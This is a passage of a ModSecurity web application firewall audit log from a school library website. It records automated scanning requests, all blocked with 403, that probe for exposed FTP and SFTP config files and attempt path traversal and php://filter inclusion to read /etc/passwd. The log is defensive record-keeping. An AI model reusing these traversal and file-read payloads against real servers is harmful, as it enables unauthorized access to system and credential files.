Accept-Encoding: gzip
X-Varnish: 137268990
--a836d658-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--a836d658-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578211145678 1938 (- - -)
Stopwatch2: 1745578211145678 1938; combined=728, p1=351, p2=350, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a836d658-Z--
--28fd6831-A--
[25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAigAAAEg 103.236.140.4 42788 103.236.140.4 8181
--28fd6831-B--
GET /ftps.config HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268999
--28fd6831-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--28fd6831-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578212145445 1900 (- - -)
Stopwatch2: 1745578212145445 1900; combined=672, p1=318, p2=328, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--28fd6831-Z--
--aab1a820-A--
[25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAjAAAAEY 103.236.140.4 42802 103.236.140.4 8181
--aab1a820-B--
GET /ftp-config.conf HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137269002
--aab1a820-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--aab1a820-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578212345273 1951 (- - -)
Stopwatch2: 1745578212345273 1951; combined=708, p1=342, p2=339, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aab1a820-Z--
--e95b5d21-A--
[25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAjgAAAEw 103.236.140.4 42802 103.236.140.4 8181
--e95b5d21-B--
GET /prevlaravel/sftp-config.json HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137269005
--e95b5d21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e95b5d21-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578212746091 685 (- - -)
Stopwatch2: 1745578212746091 685; combined=320, p1=287, p2=0, p3=0, p4=0, p5=33, sr=121, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e95b5d21-Z--
--943ac32c-A--
[25/Apr/2025:17:50:12 +0700] aAto5OOdEP6frSVs8Cp45gAAAA4 103.236.140.4 42810 103.236.140.4 8181
--943ac32c-B--
GET /sftp-config.json HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362473
--943ac32c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--943ac32c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578212942933 814 (- - -)
Stopwatch2: 1745578212942933 814; combined=300, p1=266, p2=0, p3=0, p4=0, p5=34, sr=91, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--943ac32c-Z--
--ad6ce00a-A--
[25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iOwAAAJM 103.236.140.4 42938 103.236.140.4 8181
--ad6ce00a-B--
GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137269092
--ad6ce00a-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--ad6ce00a-E--
--ad6ce00a-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578222552148 1561 (- - -)
Stopwatch2: 1745578222552148 1561; combined=515, p1=366, p2=121, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad6ce00a-Z--
--e5913959-A--
[25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iPAAAAJI 103.236.140.4 42938 103.236.140.4 8181
--e5913959-B--
GET /download_video.php?path=../../../../etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362559
--e5913959-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e5913959-E--
--e5913959-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578222750899 1725 (- - -)
Stopwatch2: 1745578222750899 1725; combined=482, p1=346, p2=108, p3=0, p4=0, p5=27, sr=70, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e5913959-Z--
--04b4de30-A--
[25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iPgAAAIo 103.236.140.4 42952 103.236.140.4 8181
--04b4de30-B--
GET /index.php?page=../../../../etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362562
--04b4de30-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--04b4de30-E--
--04b4de30-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578222949339 2728 (- - -)
Stopwatch2: 1745578222949339 2728; combined=644, p1=480, p2=134, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--04b4de30-Z--
--4bef930a-A--
[25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iPwAAAIA 103.236.140.4 42952 103.236.140.4 8181
--4bef930a-B--
GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137269098
--4bef930a-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--4bef930a-E--
--4bef930a-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578223152152 1493 (- - -)
Stopwatch2: 1745578223152152 1493; combined=469, p1=355, p2=87, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4bef930a-Z--
--7ffad05a-A--
[25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQAAAAIY 103.236.140.4 42952 103.236.140.4 8181
--7ffad05a-B--
GET /download_video.php?file=../../../../etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362565
--7ffad05a-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--7ffad05a-E--
--7ffad05a-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578223349585 1609 (- - -)
Stopwatch2: 1745578223349585 1609; combined=507, p1=387, p2=94, p3=0, p4=0, p5=26, sr=135, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ffad05a-Z--
--bf84dd76-A--
[25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQQAAAJY 103.236.140.4 42952 103.236.140.4 8181
--bf84dd76-B--
GET /download.php?path=../../../../etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137269101
--bf84dd76-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--bf84dd76-E--
--bf84dd76-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578223549309 1479 (- - -)
Stopwatch2: 1745578223549309 1479; combined=492, p1=322, p2=143, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bf84dd76-Z--
--cc277a67-A--
[25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQgAAAIs 103.236.140.4 42952 103.236.140.4 8181
--cc277a67-B--
GET /download.php?file=/etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362568
--cc277a67-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--cc277a67-E--
--cc277a67-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578223746952 1379 (- - -)
Stopwatch2: 1745578223746952 1379; combined=426, p1=320, p2=79, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cc277a67-Z--
--91cc3750-A--
[25/Apr/2025:17:50:23 +0700] aAto7-OdEP6frSVs8Cp47QAAAAI 103.236.140.4 42966 103.236.140.4 8181
--91cc3750-B--
GET /download.php?file=../../../../etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362571
--91cc3750-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--91cc3750-E--
--91cc3750-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578223944946 3276 (- - -)
Stopwatch2: 1745578223944946 3276; combined=1093, p1=506, p2=558, p3=0, p4=0, p5=29, sr=134, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--91cc3750-Z--
--0abada28-A--
[25/Apr/2025:17:50:24 +0700] aAto8OOdEP6frSVs8Cp47gAAABA 103.236.140.4 42966 103.236.140.4 8181
--0abada28-B--
GET /download_worksheet.php?action=/etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137269107
--0abada28-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--0abada28-E--
--0abada28-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578224144731 2351 (- - -)
Stopwatch2: 1745578224144731 2351; combined=607, p1=450, p2=128, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0abada28-Z--
--f693960c-A--
[25/Apr/2025:17:52:23 +0700] aAtpZ-XF4ZX3hX-IbN7jFAAAAIo 103.236.140.4 44612 103.236.140.4 8181
--f693960c-B--
GET /config.inc.php.old HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270168
